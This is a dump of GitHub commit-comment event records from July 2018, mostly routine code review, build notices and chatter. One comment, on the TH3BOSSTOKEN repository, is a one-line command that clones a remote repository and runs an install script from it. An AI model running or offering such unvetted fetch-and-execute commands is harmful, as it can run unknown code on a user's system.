{"id":"7909151214","type":"CommitCommentEvent","actor":{"login":"leilei-"},"repo":{"name":"OrdinaryMagician/blender-ue1export"},"payload":{"comment":{"id":29572681,"position":10,"line":42,"path":"FORMAT.md","commit_id":"9f0a0f88aa283836403eb8867a04ba902af7ec1d","created_at":"2018-07-02T21:58:10Z","updated_at":"2018-07-02T21:58:10Z","author_association":"NONE","body":"yeah i can't say anything of a crutfy 'patch' i don't need. Had my suspicions back when utglr couldn't release an unreal d3d8/9 renderer on its own page"}},"created_at":"2018-07-02T21:58:10Z"}
{"id":"7909151572","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29572682,"position":null,"line":null,"path":null,"commit_id":"2747fbeb522fa6b8fd3c707d4d84b1139f31c09e","created_at":"2018-07-02T21:58:16Z","updated_at":"2018-07-02T21:58:16Z","author_association":"OWNER","body":"```\r\n[ INFO ] DietPi-Drive_Manager | Writing zero's to partition /dev/sda1\r\n1337+0 records in\r\n1337+0 records out\r\n5476352 bytes (5.5 MB, 5.2 MiB) copied, 0.390256 s, 14.0 MB/s\r\n[ INFO ] DietPi-Drive_Manager | Writing zero's to partition table /dev/sda\r\n1337+0 records in\r\n1337+0 records out\r\n5476352 bytes (5.5 MB, 5.2 MiB) copied, 0.00963871 s, 568 MB/s\r\n[ INFO ] DietPi-Drive_Manager | Partition table target: gpt\r\n\r\nWarning: The resulting partition is not properly aligned for best performance.\r\nIgnore/Cancel?\r\n```\r\n\r\nDue to (https://rainbow.chard.org/2013/01/30/how-to-align-partitions-for-best-performance-using-parted/):\r\n```\r\nroot@DietPi:~# cat /sys/block/sda/alignment_offset\r\n0\r\n\r\n--- Kernel bug, not reloading disk info correctly?\r\n\r\nroot@DietPi:~# partprobe\r\nWarning: Error fsyncing/closing /dev/mmcblk1rpmb: Input/output error\r\nWarning: Error fsyncing/closing /dev/mmcblk1rpmb: Input/output error\r\nError: Partition(s) 6 on /dev/mmcblk1 have been written, but we have been unable to inform the kernel of the change, probably because it/they are in use.  As a result, the old partition(s) will remain in use.  You should reboot now before making further changes.\r\n```"}},"created_at":"2018-07-02T21:58:16Z"}
{"id":"7909152223","type":"CommitCommentEvent","actor":{"login":"ruthnan"},"repo":{"name":"attendanceproject/djattendance"},"payload":{"comment":{"id":29572684,"position":null,"line":null,"path":null,"commit_id":"3f8482fc07def3fe0c8b7ff2cc099da191349e59","created_at":"2018-07-02T21:58:26Z","updated_at":"2018-07-02T21:58:26Z","author_association":"CONTRIBUTOR","body":"Jerome doesn't want this though."}},"created_at":"2018-07-02T21:58:26Z"}
{"id":"7909153805","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29572688,"position":null,"line":null,"path":null,"commit_id":"33f05409634890b70b59c0398c54afa8f98ea70c","created_at":"2018-07-02T21:58:48Z","updated_at":"2018-07-02T21:58:48Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-50](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-50-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T21:58:48Z"}
{"id":"7909155532","type":"CommitCommentEvent","actor":{"login":"Gateworks"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29572695,"position":null,"line":null,"path":null,"commit_id":"7de21cea0a97a0d7931adafe69e91bd08b98f222","created_at":"2018-07-02T21:59:16Z","updated_at":"2018-07-02T21:59:16Z","author_association":"OWNER","body":"I don't really know anything about EFI. I'm assuming this is referring to UEFI on top of U-Boot and my understanding is that UEFI is popular in the server area whereas U-boot is popular in the embedded world. I'm not clear why you would want both but I chose to disable this for the Newport U-Boot we build and distribute"}},"created_at":"2018-07-02T21:59:16Z"}
{"id":"7909158385","type":"CommitCommentEvent","actor":{"login":"makmm"},"repo":{"name":"ProperVortex/eggcrackv2"},"payload":{"comment":{"id":29572701,"position":null,"line":null,"path":null,"commit_id":"96b1a3e33fba9ff21f52a8eed1d1d3570f6b83c0","created_at":"2018-07-02T22:00:03Z","updated_at":"2018-07-02T22:00:03Z","author_association":"NONE","body":"oh ok sry"}},"created_at":"2018-07-02T22:00:03Z"}
{"id":"7909161046","type":"CommitCommentEvent","actor":{"login":"Gateworks"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29572709,"position":null,"line":null,"path":null,"commit_id":"92feceb44359ee28c7ca53fb45894b8d6fd607db","created_at":"2018-07-02T22:00:40Z","updated_at":"2018-07-02T22:00:40Z","author_association":"OWNER","body":"None of this has been submitted for upstream inclusion. I would 'hope' (pray?) that Cavium would see the light and do this work but I'm guessing they wont and someone else will have to do it. This branch is a work-in-progress or starting-point for mainline inclusion."}},"created_at":"2018-07-02T22:00:40Z"}
{"id":"7909162364","type":"CommitCommentEvent","actor":{"login":"grant"},"repo":{"name":"google/clasp"},"payload":{"comment":{"id":29572714,"position":null,"line":null,"path":null,"commit_id":"43e63994c51c112a9f95ddc5efae890cae4ce431","created_at":"2018-07-02T22:01:03Z","updated_at":"2018-07-02T22:01:03Z","author_association":"MEMBER","body":"Done."}},"created_at":"2018-07-02T22:01:03Z"}
{"id":"7909164975","type":"CommitCommentEvent","actor":{"login":"agraf"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29572721,"position":18,"line":18,"path":"arch/arm/cpu/armv8/cvm-thunderx/lowlevel.S","commit_id":"4fcbd408dab39533c1b4b5cb837676b6de432acd","created_at":"2018-07-02T22:01:44Z","updated_at":"2018-07-02T22:01:44Z","author_association":"CONTRIBUTOR","body":"Ok that makes sense. In that case saving it off either by setting a variable or copying it to a safe spot from save_boot_params() is probably the nicer approach. This code here seems to rewrite lowlevel_init in a way which seems very different from upstream's ...\r\n\r\nMaybe we should just ask Cavium to upstream their code themselves and actually receive review on it."}},"created_at":"2018-07-02T22:01:44Z"}
{"id":"7909166164","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29572725,"position":null,"line":null,"path":null,"commit_id":"3f2aadc60d7a14b33186408ebee79381290e08f1","created_at":"2018-07-02T22:02:03Z","updated_at":"2018-07-02T22:02:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-tandem4](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-tandem4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-tandem4-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T22:02:03Z"}
{"id":"7909168275","type":"CommitCommentEvent","actor":{"login":"ConnorZimmerman"},"repo":{"name":"EmilChoparinov/Chip-Challenge"},"payload":{"comment":{"id":29572728,"position":null,"line":null,"path":null,"commit_id":"868c731257bdec4a5bcaa5d8dc6073ab0f1a2561","created_at":"2018-07-02T22:02:35Z","updated_at":"2018-07-02T22:02:35Z","author_association":"COLLABORATOR","body":"Ale do you still have a facebook, I couldn't find you?"}},"created_at":"2018-07-02T22:02:35Z"}
{"id":"7909168974","type":"CommitCommentEvent","actor":{"login":"FriedEggCoder"},"repo":{"name":"FriedEggCoder/hello-world"},"payload":{"comment":{"id":29572730,"position":null,"line":null,"path":null,"commit_id":"eba79483c4e92e1f24b813f384858c87d42df3a4","created_at":"2018-07-02T22:02:46Z","updated_at":"2018-07-02T22:02:46Z","author_association":"OWNER","body":"=3"}},"created_at":"2018-07-02T22:02:46Z"}
{"id":"7909174227","type":"CommitCommentEvent","actor":{"login":"mathieujobin"},"repo":{"name":"PointyCastle/pointycastle"},"payload":{"comment":{"id":29572743,"position":60,"line":64,"path":"test/test/src/helpers.dart","commit_id":"125be9428c9c4b82dc29fee947e28077ae54d46b","created_at":"2018-07-02T22:04:12Z","updated_at":"2018-07-02T22:04:12Z","author_association":"NONE","body":"I am seeing a lot of value exposing these methods via the public API, \r\nthey can be useful to compose our solution"}},"created_at":"2018-07-02T22:04:12Z"}
{"id":"7909175568","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29572745,"position":null,"line":null,"path":null,"commit_id":"f47f73f70f58c21e8dbcf2e47d654dfd90d0ec21","created_at":"2018-07-02T22:04:34Z","updated_at":"2018-07-02T22:04:34Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-391](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-391).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-391-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T22:04:34Z"}
{"id":"7909177171","type":"CommitCommentEvent","actor":{"login":"agraf"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29572748,"position":null,"line":null,"path":null,"commit_id":"7de21cea0a97a0d7931adafe69e91bd08b98f222","created_at":"2018-07-02T22:05:00Z","updated_at":"2018-07-02T22:05:00Z","author_association":"CONTRIBUTOR","body":"This option allows U-Boot to expose UEFI interfaces. It has nothing to do with the bloated UEFI implementations you know from servers.\r\n\r\nFor rationale, please take a look at my presentation at ELC last year: https://www.youtube.com/watch?v=qJAkJ3nmWgM\r\n\r\nIn a nutshell, we want to ship a Linux distribution, not firmware :). With UEFI we get a standardized interface that allows us to draw a clean line in responsibilities between OEM (people doing boards) and OSV (people doing Linux)."}},"created_at":"2018-07-02T22:05:00Z"}
{"id":"7909181744","type":"CommitCommentEvent","actor":{"login":"ALI-0000"},"repo":{"name":"moody2020/TH3BOSSTOKEN"},"payload":{"comment":{"id":29572763,"position":null,"line":null,"path":null,"commit_id":"8d9903e7918c6ea75e37980981c7e6a13079b44d","created_at":"2018-07-02T22:06:14Z","updated_at":"2018-07-02T22:06:14Z","author_association":"NONE","body":"git clone https://github.com/TH3BS/BOSS.git;cd BOSS;chmod +x ins;./ins"}},"created_at":"2018-07-02T22:06:14Z"}
{"id":"7909182811","type":"CommitCommentEvent","actor":{"login":"lrmoreno007"},"repo":{"name":"d-a-v/Arduino"},"payload":{"comment":{"id":29572765,"position":4,"line":0,"path":"tools/boards.txt.py","commit_id":"1eb9ff9f22e750c8c7c27d6cba2447b9a8b72aa8","created_at":"2018-07-02T22:06:32Z","updated_at":"2018-07-02T22:06:32Z","author_association":"NONE","body":"I would change \"sometime\" to \"usually\"."}},"created_at":"2018-07-02T22:06:32Z"}
{"id":"7909187005","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29572768,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-02T22:07:45Z","updated_at":"2018-07-02T22:07:45Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T22:07:45Z"}
{"id":"7909191781","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29572779,"position":null,"line":null,"path":null,"commit_id":"569bc3ec7e08a4427867e819ffeecd9164c40bec","created_at":"2018-07-02T22:09:08Z","updated_at":"2018-07-02T22:09:08Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-32](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-02T22:09:08Z"}
{"id":"7909197037","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29572798,"position":null,"line":null,"path":null,"commit_id":"bdc1f650011b3dc60844870c596ae5c48276f817","created_at":"2018-07-02T22:10:39Z","updated_at":"2018-07-02T22:10:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T22:10:39Z"}
{"id":"7909198281","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29572801,"position":null,"line":null,"path":null,"commit_id":"2c193338de6218ee2edde5ee7e7fdf6c99bb495e","created_at":"2018-07-02T22:11:02Z","updated_at":"2018-07-02T22:11:02Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-4](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-4) for d8train."}},"created_at":"2018-07-02T22:11:02Z"}
{"id":"7909198923","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29572802,"position":null,"line":null,"path":null,"commit_id":"236bad8243ab542544b8120a301e5f69f449f76a","created_at":"2018-07-02T22:11:11Z","updated_at":"2018-07-02T22:11:11Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-serch](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-serch).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-serch-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T22:11:11Z"}
{"id":"7909201182","type":"CommitCommentEvent","actor":{"login":"dblock"},"repo":{"name":"Waffle/waffle"},"payload":{"comment":{"id":29572809,"position":65,"line":542,"path":"Source/JNA/waffle-jna/src/main/java/waffle/servlet/NegotiateSecurityFilter.java","commit_id":"ac249a559a07a5ec6937dc95b23eef7be184a57f","created_at":"2018-07-02T22:11:51Z","updated_at":"2018-07-02T22:11:51Z","author_association":"COLLABORATOR","body":"This seems hacky at best ;) Since waffle uses JNA, use https://github.com/java-native-access/jna/blob/master/src/com/sun/jna/Platform.java#L137."}},"created_at":"2018-07-02T22:11:51Z"}
{"id":"7909205179","type":"CommitCommentEvent","actor":{"login":"thisisaaronland"},"repo":{"name":"whosonfirst/whosonfirst-properties"},"payload":{"comment":{"id":29572814,"position":null,"line":null,"path":null,"commit_id":"99258a713f7ac6a1198d951f46199c089178f933","created_at":"2018-07-02T22:13:02Z","updated_at":"2018-07-02T22:13:02Z","author_association":"MEMBER","body":"I see. Yes, that makes sense."}},"created_at":"2018-07-02T22:13:02Z"}
{"id":"7909210845","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"ensingm2/saliengame_idler"},"payload":{"comment":{"id":29572826,"position":null,"line":null,"path":null,"commit_id":"71ef7e345edda05de2c7c4a78b1da21fedf0d0fe","created_at":"2018-07-02T22:14:44Z","updated_at":"2018-07-02T22:14:44Z","author_association":"NONE","body":"Don't select random, select with less progress."}},"created_at":"2018-07-02T22:14:44Z"}
{"id":"7909211371","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/test"},"payload":{"comment":{"id":29572827,"position":null,"line":null,"path":null,"commit_id":"ffac010df0cb03f98b4db0e04b09d3c0ab1032f3","created_at":"2018-07-02T22:14:54Z","updated_at":"2018-07-02T22:14:54Z","author_association":"OWNER","body":"oofoofoofoofoofofofof"}},"created_at":"2018-07-02T22:14:54Z"}
{"id":"7909211956","type":"CommitCommentEvent","actor":{"login":"mohawkjohn"},"repo":{"name":"pgtgrly/GRruby-extension"},"payload":{"comment":{"id":29572832,"position":1,"line":2,"path":"lib/rubyplot/plots/bar.rb","commit_id":"a3c4ec01ff95392b9ab9808dbfe557b1663ead72","created_at":"2018-07-02T22:15:05Z","updated_at":"2018-07-02T22:15:05Z","author_association":"NONE","body":"You can abbreviate nested modules by just doing `module Scripting::Plots`, I believe."}},"created_at":"2018-07-02T22:15:05Z"}
{"id":"7909213363","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29572839,"position":null,"line":null,"path":null,"commit_id":"3debbeacaf062588ac0339df961976cd21ee0cf8","created_at":"2018-07-02T22:15:29Z","updated_at":"2018-07-02T22:15:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180702-221528 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180702-221528\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-02T22:15:29Z"}
{"id":"7909218200","type":"CommitCommentEvent","actor":{"login":"mohawkjohn"},"repo":{"name":"pgtgrly/GRruby-extension"},"payload":{"comment":{"id":29572849,"position":11,"line":21,"path":"lib/rubyplot/plotspace.rb","commit_id":"a3c4ec01ff95392b9ab9808dbfe557b1663ead72","created_at":"2018-07-02T22:16:51Z","updated_at":"2018-07-02T22:16:51Z","author_association":"NONE","body":"You might prefer to shorten this line to `@title_shift = 0.1 unless @title.nil?` In general, we prefer to write `unless` over `if !` in Ruby."}},"created_at":"2018-07-02T22:16:51Z"}
{"id":"7909219408","type":"CommitCommentEvent","actor":{"login":"rclemings"},"repo":{"name":"Gizra/og"},"payload":{"comment":{"id":29572852,"position":null,"line":null,"path":null,"commit_id":"4edaed4ffcbec29b418dffcaef2efedc59bbc66f","created_at":"2018-07-02T22:17:13Z","updated_at":"2018-07-02T22:17:13Z","author_association":"NONE","body":"I don't see this commit in og 7.x-2.10 on drupal.org. Has it been fixed elsewhere now or was it just omitted?"}},"created_at":"2018-07-02T22:17:13Z"}
{"id":"7909222883","type":"CommitCommentEvent","actor":{"login":"tsibley"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29572862,"position":null,"line":null,"path":null,"commit_id":"1f82400ece6c785f456ae7fe4f69a87d945581c5","created_at":"2018-07-02T22:18:16Z","updated_at":"2018-07-02T22:18:16Z","author_association":"CONTRIBUTOR","body":"Thanks for this heads up. Is there a known-good minimum version we need?"}},"created_at":"2018-07-02T22:18:16Z"}
{"id":"7909232123","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/test"},"payload":{"comment":{"id":29572877,"position":null,"line":null,"path":null,"commit_id":"8cad2444c79ff2e62653447f7dadedb919e34f9b","created_at":"2018-07-02T22:20:58Z","updated_at":"2018-07-02T22:20:58Z","author_association":"OWNER","body":"whut"}},"created_at":"2018-07-02T22:20:58Z"}
{"id":"7909232475","type":"CommitCommentEvent","actor":{"login":"MyChemicalHoemance"},"repo":{"name":"feelfreelinux/WykopMobilny"},"payload":{"comment":{"id":29572878,"position":16,"line":106,"path":"app/src/main/res/layout/top_link_comment_layout.xml","commit_id":"e0621ec40d7b08569cc4c9e3356b821331336b77","created_at":"2018-07-02T22:21:03Z","updated_at":"2018-07-02T22:21:03Z","author_association":"NONE","body":"Hhh"}},"created_at":"2018-07-02T22:21:03Z"}
{"id":"7909234611","type":"CommitCommentEvent","actor":{"login":"rclemings"},"repo":{"name":"alex-bukach/og"},"payload":{"comment":{"id":29572886,"position":null,"line":null,"path":null,"commit_id":"f9ab0c193114f067bd3b3d1f52da13688c0431c4","created_at":"2018-07-02T22:21:39Z","updated_at":"2018-07-02T22:21:39Z","author_association":"NONE","body":"I don't see this commit in og 7.x-2.10 on drupal.org. Has it been fixed elsewhere now or was it just omitted?"}},"created_at":"2018-07-02T22:21:39Z"}
{"id":"7909239090","type":"CommitCommentEvent","actor":{"login":"drgrib"},"repo":{"name":"deanishe/awgo"},"payload":{"comment":{"id":29572891,"position":39,"line":58,"path":"README.md","commit_id":"5f0051950af39371385f2dfda96483eb1423e565","created_at":"2018-07-02T22:22:58Z","updated_at":"2018-07-02T22:22:58Z","author_association":"NONE","body":"@deanishe This definitely isn't a general appeal to \"best practices\". It is about ease of workflow logic development. \r\n\r\nI really prefer to be able to develop Go programs easily with the terminal and a code editor without third-party plug-ins or setup files. The way I imagined doing this when I started using `awgo` was by rapidly developing my JSON output flow using `stdout`. So while you are getting some convenience for shipping the final project to Alfred, you are exacting a cost on developers to have to use an elaborate setup to develop the workflow in `stdout`.\r\n\r\nIf you insist on this setup being the one required to do shell development, I recommend making an example tutorial of how to do it in the simplest way possible for those of us who don't use a lot of workflow variables and just want to quickly develop an Alfred workflow with a few simple user interface options to e.g. be passed to another workflow node. The way I have to debug now is to build and run the executable in Alfred because I just don't get your third-party / settings file development process and don't really have the free time to learn it."}},"created_at":"2018-07-02T22:22:58Z"}
{"id":"7909258449","type":"CommitCommentEvent","actor":{"login":"ariadruker1"},"repo":{"name":"ariadruker1/IND3156"},"payload":{"comment":{"id":29572941,"position":null,"line":null,"path":null,"commit_id":"a1acced06d1efc88842daa4c17a7b0a9d7e428a6","created_at":"2018-07-02T22:28:58Z","updated_at":"2018-07-02T22:28:58Z","author_association":"OWNER","body":"Starting version 1 of final project - trying to use VADER to determine positive and negatively connotated song lyrics"}},"created_at":"2018-07-02T22:28:58Z"}
{"id":"7909259889","type":"CommitCommentEvent","actor":{"login":"tsibley"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29572942,"position":null,"line":null,"path":null,"commit_id":"1f82400ece6c785f456ae7fe4f69a87d945581c5","created_at":"2018-07-02T22:29:26Z","updated_at":"2018-07-02T22:29:26Z","author_association":"CONTRIBUTOR","body":"Created an issue for this: https://github.com/nextstrain/docker-base/issues/3"}},"created_at":"2018-07-02T22:29:26Z"}
{"id":"7909267012","type":"CommitCommentEvent","actor":{"login":"jlelse"},"repo":{"name":"glenux/contrib-maily-form"},"payload":{"comment":{"id":29572961,"position":null,"line":null,"path":null,"commit_id":"41f60b76a49a3c18b3adeb1e97203d4a60856646","created_at":"2018-07-02T22:31:43Z","updated_at":"2018-07-02T22:31:43Z","author_association":"NONE","body":"Do you want to create a PR with that? :smile: "}},"created_at":"2018-07-02T22:31:43Z"}
{"id":"7909268221","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29572964,"position":260,"line":260,"path":"src/main/java/org/digitalmediaserver/crowdin/tool/OrderedProperties.java","commit_id":"894611bbcb24d3a4e5e7d66d4fa5348349744dc4","created_at":"2018-07-02T22:32:06Z","updated_at":"2018-07-02T22:32:06Z","author_association":"NONE","body":"It seem that reuse isthe  more correct form?\r\nhttps://www.merriam-webster.com/dictionary/reuse\r\nhttps://en.wikipedia.org/wiki/Reuse"}},"created_at":"2018-07-02T22:32:06Z"}
{"id":"7909268948","type":"CommitCommentEvent","actor":{"login":"lurch"},"repo":{"name":"raspberrypi/documentation"},"payload":{"comment":{"id":29572965,"position":null,"line":null,"path":null,"commit_id":"3556e2af6b7e5851c89620ef92d42ae335e73626","created_at":"2018-07-02T22:32:19Z","updated_at":"2018-07-02T22:32:19Z","author_association":"COLLABORATOR","body":"@JamesH65 Just out of curiosity, what (user) benefit is there to still listing the 'old' Release 1 version of the datasheet?"}},"created_at":"2018-07-02T22:32:19Z"}
{"id":"7909270822","type":"CommitCommentEvent","actor":{"login":"simodanil1997"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29572974,"position":14,"line":51,"path":"src/init.cpp","commit_id":"67ed8657eadaaa2e4eac74c88c8d59e9c7b5da12","created_at":"2018-07-02T22:32:55Z","updated_at":"2018-07-02T22:32:55Z","author_association":"NONE","body":"Lve"}},"created_at":"2018-07-02T22:32:55Z"}
{"id":"7909271238","type":"CommitCommentEvent","actor":{"login":"simodanil1997"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29572976,"position":11,"line":48,"path":"src/init.cpp","commit_id":"67ed8657eadaaa2e4eac74c88c8d59e9c7b5da12","created_at":"2018-07-02T22:33:03Z","updated_at":"2018-07-02T22:33:03Z","author_association":"NONE","body":"Svs"}},"created_at":"2018-07-02T22:33:03Z"}
{"id":"7909272188","type":"CommitCommentEvent","actor":{"login":"simodanil1997"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29572979,"position":11,"line":48,"path":"src/init.cpp","commit_id":"67ed8657eadaaa2e4eac74c88c8d59e9c7b5da12","created_at":"2018-07-02T22:33:21Z","updated_at":"2018-07-02T22:33:21Z","author_association":"NONE","body":"Simo"}},"created_at":"2018-07-02T22:33:21Z"}
{"id":"7909272854","type":"CommitCommentEvent","actor":{"login":"ibc"},"repo":{"name":"yangjinecho/mediasoup"},"payload":{"comment":{"id":29572983,"position":56,"line":114,"path":"worker/src/RTC/UdpSocket.cpp","commit_id":"ca9916d23b99460c32707b4593f4c4eb366266e0","created_at":"2018-07-02T22:33:34Z","updated_at":"2018-07-02T22:33:34Z","author_association":"NONE","body":"You should not check `configuration.rtcIPv4s[ip]`. In C++ this will create an empty i the map for the given `ip` as key (with invalid/empty value). Use `rtcIPv4s.find(ip) == rtcIPv4s.end()` instead.\r\n\r\nBTW: do you plan to propose a PR for this?"}},"created_at":"2018-07-02T22:33:34Z"}
{"id":"7909273168","type":"CommitCommentEvent","actor":{"login":"simodanil1997"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29572984,"position":115,"line":1336,"path":"src/init.cpp","commit_id":"67ed8657eadaaa2e4eac74c88c8d59e9c7b5da12","created_at":"2018-07-02T22:33:41Z","updated_at":"2018-07-02T22:33:41Z","author_association":"NONE","body":"Gsghs"}},"created_at":"2018-07-02T22:33:41Z"}
{"id":"7909275783","type":"CommitCommentEvent","actor":{"login":"luserx0"},"repo":{"name":"hsgr/panopticon"},"payload":{"comment":{"id":29572988,"position":null,"line":null,"path":null,"commit_id":"0eb1f6e461f8d857919c3b0a4473b2c998a9551a","created_at":"2018-07-02T22:34:32Z","updated_at":"2018-07-02T22:34:32Z","author_association":"NONE","body":"I approve of this merge"}},"created_at":"2018-07-02T22:34:32Z"}
{"id":"7909277574","type":"CommitCommentEvent","actor":{"login":"vara850119"},"repo":{"name":"vara850119/VersioningTest"},"payload":{"comment":{"id":29572989,"position":null,"line":null,"path":null,"commit_id":"e5f04bc4240793246c0347254d385577c75e70f8","created_at":"2018-07-02T22:35:09Z","updated_at":"2018-07-02T22:35:09Z","author_association":"OWNER","body":"Let's commit it"}},"created_at":"2018-07-02T22:35:09Z"}
{"id":"7909283906","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/simplehashtable"},"payload":{"comment":{"id":29573009,"position":null,"line":null,"path":null,"commit_id":"935a2b99ecd4b04514960cd7931f55552f2ded60","created_at":"2018-07-02T22:37:10Z","updated_at":"2018-07-02T22:37:10Z","author_association":"OWNER","body":"This is intended to make it easier to test hash algorithms"}},"created_at":"2018-07-02T22:37:10Z"}
{"id":"7909286632","type":"CommitCommentEvent","actor":{"login":"lAminl"},"repo":{"name":"FONQRI/UCCP_Server_POCO"},"payload":{"comment":{"id":29573020,"position":78,"line":85,"path":"src/database/database.h","commit_id":"42a2aeac92eff806b9e40a05d8434bcd8822e93f","created_at":"2018-07-02T22:38:04Z","updated_at":"2018-07-02T22:38:04Z","author_association":"NONE","body":"typo: birthday***"}},"created_at":"2018-07-02T22:38:04Z"}
{"id":"7909287521","type":"CommitCommentEvent","actor":{"login":"aren"},"repo":{"name":"foxpass/foxpass-setup"},"payload":{"comment":{"id":29573022,"position":null,"line":null,"path":null,"commit_id":"3e595ad09fec0072d1e61fe82723a2471397eb1f","created_at":"2018-07-02T22:38:21Z","updated_at":"2018-07-02T22:38:21Z","author_association":"CONTRIBUTOR","body":"I think this should be `linux/amzn/2.0/foxpass_setup.py`. I don't think we need a new script for every security update in `2.0`."}},"created_at":"2018-07-02T22:38:21Z"}
